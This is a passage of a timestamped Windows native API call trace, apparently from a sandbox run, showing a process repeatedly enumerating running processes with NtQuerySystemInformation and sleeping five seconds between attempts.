[0148.937] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.938] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.938] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.940] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.940] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.951] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.951] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.954] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.978] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.979] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.982] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0148.985] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0148.985] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0148.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0148.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0148.998] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0148.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0148.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.000] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.001] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.017] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.017] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.029] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.029] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.032] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.043] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.045] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.046] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.046] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.048] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.049] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.098] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.098] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.099] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.099] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.101] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.102] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.139] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.152] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.153] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.153] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.155] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.156] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.169] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.169] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.172] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.184] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.185] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.187] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.188] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.201] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.201] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.203] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.215] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.216] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.216] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.220] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.231] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.233] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.234] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.246] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.247] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.247] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.249] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.249] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.264] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.264] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.278] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.278] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.280] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.293] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.293] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.294] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.294] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.296] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.297] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.310] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.310] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0149.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0149.312] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0149.313] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0149.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0149.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0149.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0149.325] 